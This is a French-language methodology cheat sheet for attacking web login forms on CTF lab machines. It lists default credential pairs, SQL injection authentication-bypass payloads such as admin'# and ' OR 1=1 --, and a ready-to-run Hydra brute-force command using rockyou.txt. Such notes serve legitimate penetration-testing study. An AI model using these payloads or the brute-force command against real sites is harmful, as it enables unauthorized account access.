Formulaire de login web
Tu as trouve un formulaire de connexion (login/password) sur un site web. Voici la marche a suivre, dans l'ordre de priorite.
Checklist
1. Credentials par defaut
- Tester les combinaisons classiques avant tout le reste :
| Username | Password | Quand |
|---|---|---|
admin | admin | Toujours tester en premier |
admin | password | Classique |
admin | qwerty123 | Si CMS detecte (Magento) |
root | root | Si interface admin systeme |
administrator | admin | Windows |
- CMS detecte ? → Chercher les credentials par defaut de ce CMS specifique
- Magento : penser aux contraintes de la politique de mots de passe (7+ chars, 1 chiffre, 1 special)
Boxes :
Preignition(admin/admin),Ignition(admin/qwerty123)
2. Credentials trouvees ailleurs
- FTP anonyme → listes d'users/passwords ? → les tester ici
Box :
Crocodile(userlist + passwords trouves sur FTP)
3. SQL Injection (auth bypass)
- Tester un payload SQLi dans le champ username :
admin'#
- Si ca marche → acces direct sans connaitre le password
Box :
Appointment
4. Autres payloads SQLi
- Si
admin'#ne marche pas, tester :
' OR 1=1 --
' OR 1=1 #
admin' --
admin' OR '1'='1
5. Brute-force (dernier recours)
- Seulement si tout le reste a echoue
- Utiliser Hydra avec une wordlist
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
Arbre de decision
Formulaire de login
├── 1. admin/admin → ca marche ? → PWNED
├── 2. Creds trouvees sur FTP/SMB → ca marche ? → PWNED
├── 3. admin'# → ca marche ? → PWNED (SQLi)
├── 4. Autres payloads SQLi
└── 5. Brute-force Hydra (dernier recours)
Liens
- Credentials par defaut : Cheatsheet - Credentials
- SQL Injection : Cheatsheet - SQLi
- Brute-force : Cheatsheet - Hydra